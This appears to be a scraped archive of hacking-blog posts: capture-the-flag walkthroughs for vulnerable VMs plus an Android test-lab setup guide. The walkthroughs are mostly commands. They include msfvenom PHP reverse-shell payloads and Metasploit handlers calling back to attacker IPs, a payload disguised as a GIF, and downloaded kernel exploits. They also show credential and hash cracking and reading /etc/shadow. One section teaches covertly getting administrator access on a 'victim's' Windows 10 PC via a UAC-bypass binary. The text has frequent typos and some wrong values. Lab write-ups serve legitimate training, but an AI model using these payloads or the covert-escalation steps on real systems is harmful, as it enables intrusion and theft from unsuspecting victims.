msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Once the file is generated copy the code from .php

Now if you try to upload this file you will get an error saying that not allowed extension, please upload images only. So, therefore, you will need change the extension of your .php file.

Before changing the extension you need to add GIF98 at the top of the code as shown below, also change the extension to .gif

After changing the extension when you will try to upload the file you will succeed.

Once the file is uploaded, we still need a way to execute this file. And for that right click on that file and click on copy image location option.

As of now you have copied image location, now you need to install Tamper Data. Tamper Data is a Firefox Extension which gives you the power to view record and even modify outgoing HTTP requests. It helps you to capture cookies and http requests.

Open Tamper Data and click on Start Tamper.

A dialog box will appear. From it clicks on Tamper button on the right corner.

By doing so a dialog box will appear. Keep this dialog box open in the background and open metasploit meanwhile

After opening metasploit type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Running the above commands will helps you gain a meterpreter session of the lab.

Now go to that dialog box of tamper data which was open in the background. In the dialog box you can see there is a option of cookie. In the adjacent text box to the cookie option delete whatever was written and type:

lange=../*Image location path*

Here,

*image location path* is the path of the file that you uploaded and had copied it after that.

By doing so you are commanding tamper data to execute your own malicious file instead of running its code which helps us to capture the cookies. After giving the path, the second you will click on OK, you will have you meterpreter session.

But this is not enough as we still need to bypass admin. And if you go to the shell of the lab and try to switch user, you will note that the command will show error. To gain the full access of PwnLab you will still need to follow some commands. So, therefore, type:

echo 'import pty; pty.spawn(' /bin/bash') "> /tmp/asdf.py

python /tmp/asdf.py

The execution of the command will take you inside the PwnLab and if you try to switch the user; you wil succeed. To switch the user command is:

su kane

iSv5Ym2GRo

Here,

su --> denotes the switch user

kane --> the user you want to switch to

iSv5Ym2GRo --> is the password

After the execution g of it, you will enter the user kane.

Next, if you type ls command you will that there is a folder named home in the user that we just entered. So, will go into that folder and to do so, type;

cd home

As you have entered the home folder, type:

ls -lsa

This command will show you all the users in the home ith all the details. So, now t hat you know how many users are t heir and what are their usernames, go back to kane user and for that type :

cd kane (this command will bring you back to the kane user)

ls -lsa (this command will list all the folders present in the kane)

As you can see in the image below, there is file in kane user called msgmike. Let us try to open it and therefore, type :

./msgmike

If you try to open it, it will give you erroe saying such file doesn't exist. So, now let us change user and see if we can open this file from another user type :

cd ..

cd kent

cd mike

You can see that permission to every other user is denied. So now, type:

echo " /bin/bash"> cat

chmod 777cat

With theses above commands we are using cat command which allows us to create single or multiple files, view contain of file, concatenate files and redirect output in terminal or files. After creating the file we are giving it perssion to access through chmod command.

Then further type:

export PATH=. : $PATH

./msgmike

Once the above command is executed, we will have access to msgmike file as we desired and have entered other user named mike. Now if you type:

You will see that the above command will show you all the users and will also inform you which administrator user is.

Now that you are in the user mike open the home folder and then go to mike folder. And the type:

./msg2root

test; /bin/sh

id ( this command will show you the users)

whoami (this command will tell you that you are the administrator)

ls (it will show the list of files in the root)

cat flag.txt ( this command will execute flag.txt which was our main motive)

This was an excellent challenge. It requires us to think outside of the box, correlate findings, and manually validate vulnerabilities. This was a good example of the importance of manual methods, as no automated vulnerability scanner would have disclosed the flaws found during this engagement. This challenge also demonstrates the importance of validating user input.

This is our another article of root2boot penetration testing challenge. We will walk through a exploitable framework Mr. Robot. It is based on the TV show, Mr. Robot, it has three keys hidden in different locations. The main goal is to find all three tokens hidden in the system. Each key is progressively difficult to find. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

First Download the Mr Robot Lab fromhere

First of all we have to find its IP address and for that go to the terminal of your Kali and type :

netdiscover

Upon the execution of the above command we will know about all the IP addresses in our network. Our target IP is 192.168.0.102, let us scan it.

To scan our target IP we will use aggressive scan(-A)

nmap -A 192.168.0.102

The scan's result shows us the open ports are : 22, 80, 443. As the 80 port is open we can try and open this IP in our browser.

And yes, it opens which further confirms our target.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type :

nitko -h 192.168.0.102

From the result we can gather that there a text file with the name of robots.txt which might provide us with some further information. So now let us try and open this file in the browser.

Opened the key-1-of-3.txt file from the browser and I also had the first of the 3 keys mentioned in the readme.

Now open fsocity.dic file in browser which is a dictionary file. Let us first try and open this dictionary file the browser.

Once we open the said dictionary file in the browser, it asks us to download it. Going ahead we downloaded and opened it. It is a file which may contains username and passwords.

So now that we know we might have username and passwords, we will try and logon into our target. One by one we have tried every username and it has given the error that the username doesn't exist. But when we used the name elliot it gave us the error that the password is incorrect.

With this we know one thing for sure that elliot is a correct username and now we just have to find a password for it.

Our best guess to find the password the same dictionary file from which we found the username. Thus, moving forward we will use WPScan to find our password from the same file. For this open WPScan in the terminal of Kali and type :

ruby ./wpscan.rb --url http://192.168.0.102 --wordlist /root/Desktop/fsocity.dic --username elliot

Here,

./wpscan.rb --> starts the WPScan

--url --> denotes the URL onn which WPScan will work

http://192.168.0.102 --> is our URL

--wordlist --> denotes the path of the dictionary file

--username --> denotes username

elliot --> username

Once the command starts working it will take its time to execute as the dictionary file we got is huge. So, sit back and relax and let the WPScan do its work.

When the execution is completed (which may time much time as in our case it took almost 4 hours) you will have the password for the username elliot which is ER28-0652.

Using the password, logon in to the target.

One you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from to die(); and paste it on template(and save it)

Now you have access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the msfvenom generated shell

And simultaneously open metasploit and type :

Use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Once the exploit is executed, open the path of the template in the browser as shown :

Browsing to http://192.168.0.102/wp-content/themes/twentyfifteen/404.phpand press enter

Once you open the template path in the browser then you will have a meterpreter session and once you have it, go to the shell and type :

echo import pty; pty.spwan(' /bin/bash')"> /tmp/asdf.py

python /tmp/asdf.py

After doing the above, you will enter a user of our target and to know all the information about the user type :

ls -lsa (gives us the information about the user we just entered)

cd home (take us in the folder home)

ls -lsa (gives the information about the home folder0

cd robot (takes us into the robot folder)

Now, to know the information about the robot folder/file we will type :

ls -lsa

We now know that there are two important files, one of them is a text file other is password in the form of MD5. If we try to open the text file by typing :

cat key-2-of-3.txt

It will not open as we do not have the permission to do so. But now let us try and open the MD5 file and for that type :

cat password.raw-md5

Executing the above command will give a MD5 value(hash value) of the password as you can see below :

We will use md5cracker.org (online md5 value cracker) to crack this MD5 value. Enter the MD5 value in to the text box and click on crack/encrypt button.

The value will translate to abcdefghijklmnopqrstuvwxyz as shown below :

Now in the terminal try to switch the user to robot by the command :

su robot

Following the command it will ask you for the password. Enter the MD5 cracked password here and you will enter the robot user and to gain its information type :

ls -lsa

Now, try to open the remaining text file by typing :

cat key-2-of-3.txt

Next type the following :

nmap

nmap --interactive

With the above commands you will enter nmap then type :

!sh

id (to know the users)

cd /root (lets you to enter root)

Once you have enetered the root, type :

ls -lsa

cat key-3-of-3.txt

And upon the execution of we will obtain 3 of 3 keys, hence entering Mr. Robot. There are many ways to perform the above but this methods is the easiest. We hope you find it effective and interesting and it helps you to improve.

Microsoft is increasing its security with the evolution of their windows. And with that it is getting more and more difficult to hack them. It is often said "where there is will; there is a way", threfore thankfully it is not impossible to do so. Once you have hacked into WIndows 10 PC then it is difficult to gain it administrator access without getting your victim suspicious. Therefore, we present you a new way to do so.

Move along with following steps and you will learn how to gain administrator access of windows 10 PC without the Victim's suspicion.

First of all, to learn to how to hack victim's PC click here.

After hacking when you have gained a meterpreter session then type :

getsystem

using this command you will confirm the fact that you have not entered the administrator yet. So now, there is no need to worry. Just download this Tpinit file from --> here

And now upload the said file into victim's PC by typing :

upload /root/Desktop/TpmIniyUACBypass.exe d:\\

Here,

upload --> is use to upload a file

/root/Desktop/TpmIniyUACBypass.exe --> is the path of the file that is to be uploaded

d:\\ --> is location of where the file will be uploaded in victim's PC

As the file is uploaded, open metasploit simultaneously and type :

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 102.168.0.106

set lport 443

exploit

Once this exploit is executed. go to the meterpreter session that you previously had and type :

shell

Typing shell will take you to the shell of the PC. Now further type :

d: (This command will take into the D Drive of victim's PC i.e where you upload your file)

TpmInitUACBypass.exe 192.168.0.106 msf (This command will execute your uploaded file)

As the command will make our file execute we will have a session with administrator privileges as shown

In this article we will complete a root2boot challenge of Capture the Flag series. This is Walkthrough of droopy which is a vulnerable framework but it is little bit complex too. Download it from --> Here

Walkthrough

Let us start by scanning the network so that we can know the IP of our target. And to scan the network types the following:

netdiscover

Our target IP is 192.168.1.103. Now that we know our target let's scan it, therefore, type:

nmap -A 192.168.1.103

From scanning, we gather that port number 80 is open and that it has Drupal' version 7 which is known for its vulnerability. So let us start exploiting it so that we have our meterpreter session. To exploit open metasploit and type:

search drupal

Searching the exploit for drupal will list the various exploits. From the exploits you need to use drupal_drupageddon exploit. Now, type:

Now type use exploit/multi/http/dupal_drupageddon

msf exploit (dupal_drupageddon)>set rhost 192.168.1.103 (IP of Remote Host)

msf exploit (dupal_drupageddon)>set rport 80

msf exploit (dupal_drupageddon)>exploit

Upon the execution of the above exploit you will have a meterpreter session. And once you have the meterpreter session then type:

Running the following command will allow you to have better visibility of the path that you are in

shell

echo "import pty; pty.spawn(' /bin/bash')"> /tmp/asdf.py

python /tmp/asdf.py

Now using the above commands we have entered the terminal. Our next step is to find the kernel version of Ubuntu. TO know the said type:

lsb_release -a

We, now know that our target is using Ubuntu 14.04 Let us try and search its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below:

We already now know that this exploit is not available in metasploit from the site below:

Now to download the exploit we have to find a writable file to download the exploit. Next I need to find a directory I can write to and run scripts from.

find / -writable -type d 2>/dev/null

cd /tmp/ (It will take us into the /tmp folder)

wget https://www.exlpoit-db.com/download/37292(This will download the exploit)

Now, we have over the downloaded file and compile it and then run it so have the control of root. To do so, commands are:

mv 37292 37292.c (It will move the file and renamed it)

gcc 37292.c -o kernel (This command will compile the file and output save it as kernel)

chmod 777 kernel (It will give you the permission to execute the file)

./kernel (It will execute the file)

After executing the above commands we will enter the root. To confirm it let us try a command:

whoami (This command will inform you that you are root)

cd /root (it will take into the /root folder)

ls (it will list all the files present in the root folder)

We have found a file named dave.tc. If you open the file in the browser it will say to download the file. OK! Let’s download it.

We can easily get to /var/www/html/sites from the web front end so let's copy dave.tc there

Cp dave.tc /var/ww/html

Let's open the file from VeraCrypt. It’s the software which will help you to mount the file so that you can open it. Download it from -->https://veracrypt.codeplex.com/wikipage?title=Downloads

When you open VeraCrypt, select 1 so that it will mount the disk into 1 disk.

When you try to open it, it will ask you a password. Now we don't have the password, let us explore and find it

First of all let us explore the file which contains all the hash values. We all know the hash vales are in shadow folder. And to read it the command is:

cat /etc/shadow

We have the hash value of root. Now, let us check which hash is used. We check an online hash identitifier to do our work. Search Google for "online hash identifier"

We have used onlinehashcrack.com. Copy and paste the hash on the site. Result is showing us that the SHA512 is used to crypt it.

While exploring we also found a mail. Let us read it and therefore type:

cat /var/mail/www-data

Now reading the mail we know certain things for sure and they are:

· password is of 11 characters

· password is related to academy

To find our password we will first run a command which will filter our rockyou.txt file. We will strongly suggest you to filter it as we know it contains 8M passwords. If we run the txt file as it is then it will take whole day to find the password. So to filter it we will apply three conditions that the words we will collect should be in lower case and should have academy word in it.

(Refernce : https://kaizensecurity.wordpress.com/2016/04/29/droopy-v0-2-solution/)

To do so, the command is:

awk 'length($1) == 11 { print $1 }' /usr/share/wordlists/rockyou.txt |egrep '^[[:lower:]]+academy'> /root/Desktop/pass.txt

Now that we have our txt file filtered, we will find the password using truecrack. The command is :

truecrack --truecrypt /root/Download/dave.tc -k SHA512 -w ?root/Desktop/pass.txt

Using the above command you will have you password in minutes. Now that we have our password, we will try and mount the drive from VeraCrypt again. Follow the same procedure as earlier and then add the password and check the true crypt mode.

When you will click on OK. You will have the mounted drive in your Desktop

Open the drive by double clicking on it and go to .secret and then open .top and that last you will have flag.txt.

VOILA!! You have achieved the flag!!

This was the walkthrough the Droopy. Enjoy capturing the flags!

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is to reconnaissance, enumeration, and exploits this vulnerable machine to get root access and to read the contents of flag.txt. We have been told that are various methods to do so but we have tried and found the simplest way.

Download the stapler vm fromhere

WalkThrough

Start off with scanning the network to find our target. And we all the command for it is:

netdiscover

We found our target --> 192.168.1.105

To scan our target we will use Sparta. Sparta is combination of nmap scanning and Nikto. It makes our work simpler. To open Sparta, Open kali linux > Applications > Information Gathering > Sparta. After opening Sparta, click on where it says "click here to add host to scope". A dailog box will open asking target's IP. Give your target' IP there and click on add scope.

Once Sparta starts working, it will show you all the ports open on our target.

Result shows us that port number 21, 22, 53, 80, 137, 139, 666, 3306, 12380 are open. The Nikto tab in Sparta of port number 80 shows us that we can open our target IP in browser also it provides us with the information that /.bashrc and /.profile are the files which may contain useful information.

Firstly, we will open our target IP in the browser to see if we find anything.

As you can see that we do not find anything upon opening the target IP in the browser. So, then we tried to open the two files which we found with the help of Nikto. When we open that file it asks us to download a file. No harm in that. So we downloaded the file.

We regretted doing so as there was nothing in both of these files. It was useless to do so. So we explored more of Nikto has to provide and found out that we could exploit port number 21 which has FTP service. Nikto took the liberty of using hydra and finding the username and password of ftp which is ftp and password respectively.

Now that we had username and password, so, we tried to exploit it through the terminal of kali by typing :

ftp 192.168.1.105

ftp (username)

password (password)

And again we found nothing in it. Similarly, we tried to exploit port numbers 22, 139 and 666 respectively. Alas! We found nothing. Again!

So we decided to explore Nikto more and we found that there was a robots.txt file on the port number 12380with two entries. We also noticed that the site had SSL security which meant it will only open with prefix https://

So firstly we tried opening it in browser with port 12380.

Finally, something happened! The site opened on the port 12380. Then we tried to open robots.txt (https://192.168.1.105/robots.txt) and we found two entries i.e. /admin112233/and /blogblog/

We opened them one by one only /blogblog/ proved to be useful as a blog opened in it.

Studying this blog we have established that the blog is made off Word Press. Now obviously use WPScan to know all about the blog. To apply wpscan we have come up with a 3-in-1 command as it will tell us all about the theme and plug-ins as well as usernames and the command is:

wpscan --url https://192.168.1.105/blogblog/ --enumerate ap --enumerate at --enumerate u

The wpscan has also informed us about the upload directory as we have highlighted in the above image.

Completing the scan and we found one plug-in i.e. advanced video plug-in and we searched for its exploit on www.exploit-db.com and found one exploit for it

Traversing the exploit we found the correct command to execute and use it to our advantage and the command is:

http://127.0.0.1/wordpress/wpadmin/adminajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILE PATH]

We formatted the command as per our usage

http://192.168.1.105/blogblog/wpadmin/adminajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

When our formatted URL will be executed, it will show us an error. Also, if you will pay attention there will be some changes on the Wordpress blog.

It gives us an image. We already know where is upload directory (from WPScan) so we can directly go there to view/download the image. And for this our URL will be:

https://192.168.1.105/blogblog/wp-content

Now if we try to open this image or download it then it will show us an error as same as shown below:

The trick here is to download the image file without any extension. Run the following command to read the image:

cat 1439829871

This provides us with the username and password of MYSQL. To enter the MYSQL database we will use third-party tool called HeidiSQL_9.3_Portable.

Open the tool; give target IP in hostname, username in user and password in password. Then click on OK.

Clicking on OK we will enter the database.

Click on wp _users to see the usernames and passwords of all the users.

As you can see that all the passwords are encrypted. So now we will apply dictionary attack using WPScan to the first username that we had found which was john with the help of rockyou.txt. The command to do so is:

wpscan --url hhtps://192.168.1.105/blogblog --wordlist /usr/share/wordlist/rockyou.txt --username john

Once the attack is completed we will have the password for username john i.e. incorrect.

Now we will logon using the said username and password.

As we have logged in, all now we have to do is to create our PHP code to upload so that once the code will execute we will have its session. To generate the code type:

msfvenom -p php/meterpreter/reverse_tecp lhost-192.168.1.105 lport=4444 -f raw

Copy the code from to die() and save it in a file with .php extension.

Now, as we already logged on, go to plugins option then select add plugin option. Click on browse option and select the PHP in which you have just saved the code and click on OK.

Now go to the upload directory and double click on the you just uploaded.

Simultaneously, open metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter's session. Further type:

shell

And then type the combination of two following commands to import and running the python file to reach the terminal:

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Now, we will check the Ubuntu version so that we can find its exploit and so type:

lsb_release –a

Now with the following command we will find a writable folder:

find / -writable -type d 2>/dev/null

We now know that our target is using Ubuntu 16.04 so we will try and search its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below:

We already now know that this exploit is not available in metasploit so we will copy its code to download it as shown:

Now, we need to go into the desired writable file and for that type :

cd /tmp

And then to download the exploit type:

Wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

When we download the exploit, zip files are downloaded and now unzip it and for that type:

unzip 39772.zip

Open the unzipped file by typing:

cd 39772

Now we have a tar file named exploit.tar. Open it with the following command:

tar -xvf exploit.tar

Now use the ls command to view the directories. Now we will go into the double put-exploit folder and for that type:

cd ebpf_mapfd_doubleput_exploit

ls (list the directories)

./compile.sh (will run the compile.sh)

./doubleput (will run the double.sh)

whoami (will tell you where you have reached)

cd /root (will take you into /root)

ls (shows you the directories of /root)

cat flag.txt

Today we will takw up a boot2root challenge by Nightmares. We will work on Sidney: 0.2 made by Nightmares. This is the third challenge he genially came up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag. You can download this VM from --> https://www.vulnhub.com/entry/sidney-02,149/

Walkthrough

First things we need to know what IP did the VM got. So naturally scan the network using:

netdiscover

Now that we have located our target IP i.e. 192.168.0.104, our next step is to scan it.

nmap -A -p- 192.168.0.104

Upon scanning we know that port number 80 is open that means this IP will open in the browser so let us try and do that.

OK. On opening the target IP on the browser we did not get much information, therefore, we will use curl command to find out more about our target.

curl -v http://192.168.0.104/

Now if you onto the source code, you can see that the word "commorode64" used a lot. So we opened it in the browser (192.168.0.104/commorode64) and to our luck we found another page.

Then we decided to look into its page source.

As you will read the page source you will come to know that username is robhubbard and going further you will find some hints about the password i.e. :

· the password is in lowercase

· password has 3 letters and four digits

· and it is related to c=64 sound chip

After loking into the page source we tried to explore it more with nikto.

nikto -h http://192.168.0.104/commodore64/

Exploring through nikto proved helpful as found an index.php file so we opened it and as you can see it is asking for username and password. Now, we already know what is the username, we just have to find the password.

Getting the above hints about password, we firstly decided to look up c=64 sound chip on wikipedia. And we found:

We knew that password’s first three digits are alphabetic letters and so our best guess is MOS are the first three digits of the password.

Now everything falls on the last four digits of the password and finds that we used crunch command.

crunch 7 7 -t mos%%%% -o /root/Desktop/pass.txt

Crunch will generate your dictionary file.

And then apply dictionary attack using Burp Suite and then it will result in showing you the password as shown below:

Now on the index.php page enter the username and password. Following page will open and on this page you have to upload a malicious php file.

Entering the password you will logon to the following page:

Now to generate the said php open the terminal in your Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from to die() and save it in a file with .php extension. Now upload this file by browsing it on the webpage.

Simultaneously, open metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter’s session. Further type:

shell

And if you type the combination of two following commands to import the python file to reach the terminal then it will not work as the version of pythin is updated :

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

So to solve this problem you need to run a different set of commands i.e. :

pythin3.5 -c 'import pty; pty.spawn('/bin/bash')"> /tmp/asdf.py

bin/bash

Now you will reach the terminal. Here, type the following command to know the version of kernel :

lsb release -a

Now that we know the kernel's version we will search it's exploit in www.exploit-db.com

Exploring the exploit you will find the code that will download it.

Now we have the exploit that is to be downloaded, so we will find a writable file to download it and for type:

find / -writable -type d 2>/dev/null

Then download the file go into the said file and for type :

cd /tmp

Now in the /tmp folder if you try to download a file with wget command it will show an error so we will have to use curl command this time:

curl -O https://raw.githubusercontent.com/ofensive-security/exploit-database-bin-sploits/master/sploits/39772.zip

Now unzip the file by typing:

unzip 39772.zip

Open the unzipped file by typing:

cd 39772

Now we have a tar file named exploit.tar. Open it with the following command:

tar -xvf exploit.tar

And now move into the doubleput.c by typing:

cd ebpf_mapfd_doubleput_exploit

Moving forward, type :

ls (list the directories)

./compile.sh (will run the compile.sh)

./doubleput (will run the doubleput.c)

whoami (will tell you where you have reached)

cd /root (will take you into /root)

ls (shows you the directories of /root)

Now we are in the root of our target. Now let’s see what it has to offer us and for that type :

ls -lsa

We have all the files listed and from the list we will try and open hint.gif but first we have to copy it therefore type:

cp hint.gif /var/www/html

Now if you will open hint.gif in the browser then it will show you the following image:

So, we will try to check other files too like commodore64, so type :

cd .commodore64

And again to see what it has to offer us type:

ls -lsa

From all the files listed we will open the following:

cd .miami

ls -lsa (it wil further list the folders)

cd vice (enter into vice)

flag.zip

Don't get too excited we have obtained the flag. We still have to open it. And here is the trick, if you try to open the zip file it will ask you for the password. So, we will try to open it in for browser and for that we first have to copy it so type:

cp flag.zip /var/www/html/commodore64

When you open it in the browser it will ask you to download flag.zip. So, download it.

We will apply dictionary attack using rockyou.txt so for this the command is :

fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/flag.zip

And yes, at last you have the password. So now unzip the flag.zip by typing :

unzip flag.zip

Then it will ask you the password. Enter the recently obtained password here.

And YAY!!!!! We have captured the Flag!!! Enjoy with it.

Nowadays mobile user’s area unit increasing day by day, the protection threat is also increasing along with the expansion of its users. These threats can disrupt the operation of the smart phone, and transmit or modify user data. For these reasons, the applications deployed there should ensure privacy and integrity of the info they manage. Mobile security involves protecting personal and business information continues and transmitted from good phones, tablets, laptops and totally different mobile devices. Mobile security has become very important in mobile computing as a result of the day these days increase inside the delicate attack methods. So, now we will see how to exploit and analyze the android application for vulnerability.

So first we have to setup an environment for android application testing.

Requirements for android penetration testing:

· Virtual Box

· Santoku OS which come with preinstalled SDKs.

· GenyMotion for creating Android Virtual Device ( AVD)

· A vulnerable android app “InsecureBankv2”.

Let’s start…

So first download Santoku OS from here. Santoku OS is built especially for Mobile penetration testing and forensic investigation. Santoku comes with pre-installed SDKs and other utilities. There is a bunch of forensic tools also like firmware flashing tools for multiple vendors, some other forensic scripts for enumerating app details, etc.

After downloading Santoku open Virtual Box and create a new virtual machine for it.

Now select RAM for Santoku VM, recommended is 786MB but I took 2GB, you can select according to your own need and click NEXT.

In this section select hard disk type as per your need or select VMDK (Virtual Machine Disk)

Here select the size of the hard disk as you wish and then create VM.

Now for installing Santoku tou our created VM right click on Santoku VM and go to settings Storage then select the empty disk after click on disk icon just in front of optical drive in the attribute section and then browse and select the downloaded santoku iso file and click Okay.

Finally launch that VM and after few seconds santoku boot menu will appear select “Install- start th installer directly”

Now installation process will begin, select your preferred language then click on continue after click on Install now.

Select your preferred language for the keyboard.

Now in this section name your VM and set a strong password for login access you can also chose Login automatically but it’s not a good choice

Now santoku will start copying files and installing. Now sit back and wait for few minutes after that it will restart.

Here our Santoku is installed that means our first part is completed.

Now you can download Genymotion from here.

Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android with OpenGL hardware acceleration suitable for application testing.

After installing Genymotion, go to https://www.genymotion.com/account/create/ and create a free account there and verify your email ID. Then come back to genymotion desktop software and login there using newly created account credentials.

Now to create an AVD click on ‘Add’ a new menu will appear where you can select android devices according to device brands and version numbers.

Select the device according to your need and click next. Then in this sections your review the configuration of android mobile device and finally create virtual device.

Now the device will start download the data and deploy the virtual android device.

Here you can see I created 2 virtual devices. Now select the devices and launch it.

Here is our Android Virtual Device.

To test our application for any kind of vulnerability we need Android SDK because in our testing phase we will be going to use ADB (Android Debugger Bridge) command line almost every time. And Android SDK is preinstalled in Santoku OS. So, now we are going to connect santoku to our Android Virtual Device.

Fists check the IP of Android Virtual Device.

Now open command line in Santoku and type:

adb connect

You can check whether device is connected or not by typing:

adb devices

So here we can see that list is showing that 1 device connected.

And here you can also run shell to enter in android mobile by typing:

adb shell

So here creating penetration testing lab for android application is completed now stay tuned for next article on actual android app penetration testing and hacking.

In this walk through I will explain how to solve the SickOs 1.2 challenge. This OS is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment.

So, first let us find our target by using :

netdiscover

Our target is 192.168.1.105 Further we will apply nmap scan :

nmap -A -p- 192.168.1.105

As you can see that port 80 is open that means we can open this IP in the browser. Why not do that?

Opening the IP in the browser will show us the above image which is of no use. You can try and look into the page source but unfortunately you will find nothing there. That is why we will use dirb and to find the directories. And for that type :

dirb http://192.168.1.105

As a result you can see we have found our directory i.e. test Open it in the browser as well.

192.168.1.105/test/

It will show you the list of directories. So let us try and explore test directory via curl.

curl -v -X OPTIONS http://192.168.1.105/test

This exploring will show you that PUT is allowed that means you can upload through it.

So, prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw

Copy the code from to die() and save it in a file with .php extension.

Now to upload your .php file we will use the add-onposter.

Click on thetools from the menu bar. And then click on Poster from the drop down menu.

A following dialog box will open. Here, browse the file that you will upload and click on PUT option.

It will show you that the file is uploaded.

And you can see the same on your browser that you file will be uploaded (as in our case the file is shell.php)

Simultaneuosly, open metasploit and use multi/handler :

use multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

After hitting enter button on your keyboard, run the file you just uploaded. It will give you a meterpreter session. Go to shell typing :

shell

Now we need to import the python file to reach the terminal and to do so type :

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Now there might the kernel version that we could exploit so to check its version type ;

lsb_release -a

As you can see that version is not exploitable so we will leave it alone.

Moving further type the following to explore more and find something to be exploitable :

ls -l /etc/cron.daily

The above command will give you the list of the files. On observing you can see that there is chkrootkit. Some of its version are exploitable therefore we will check its version and for that type :

chkrootkit -V

It will show you the version which is 0.49

We will now search for its exploit in the terminal of Kali by typing :

searchsploit chkrootkit

Hence, the exploits.

Now open metasploit and check the already opened session first and then look for the exploit by typing :

search chkrootkit

And the exploit which you have to use will appear. And to use this exploit type :

use exploit/unix/local/chkrootkit

Then further typeoptions so that you will know what options you are supposed to set. Checking the options you know you only need to assignt he session and lport so type :

set session 1

set lport 8080

exploit

Now check whether you have gained another session or not and for that type :

sessions

And as you can see you will surely have one more session and so to open that session type :

sessions -i 2

As you open the session check what user you are in and for that type :

whoami

It will show you that you are in root so further type :

cd /root

And to see the list of files in /root type :

ls -lsa

In the list you will see that there is a text file and to read that file type :

cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt

4 Ways to Hack SMB Login Password

4 ways to Connect Remote PC using SMB Port

3 Ways to Mount a RAW Image in Windows

A New Way to Hack Remote PC using Xerosploit and Metasploit

Control Remote PC using PSTools

How to Detect Meterpreter in Your PC

Hack Remote Windows PC using Office OLE Multiple DLL Side Loading Vulnerabilities

Beginner Guide to Understand Hashing in Cryptography

Fun with Metasploit Payloads

Shodan a Search Engine for Hackers (Beginner Tutorial)

Setup VPN Penetration Testing Lab in Server 2008

Penetration Testing Skills Practice with Metasploitable (Beginner Guide)

Penetration Testing in PwnLab (CTF Challenge)

Hack the Mr. Robot VM (CTF Challenge)

Hack Admin Access of Remote Windows 10 PC using TpmInitUACBypass

Hack the Droopy VM (CTF Challenge)

Hack the Stapler VM (CTF Challenge)

Hack the Sydney VM (CTF Challenge)

Build an Android Penetration Testing lab

Hack the SickOS 2.1 VM (CTF Challenge)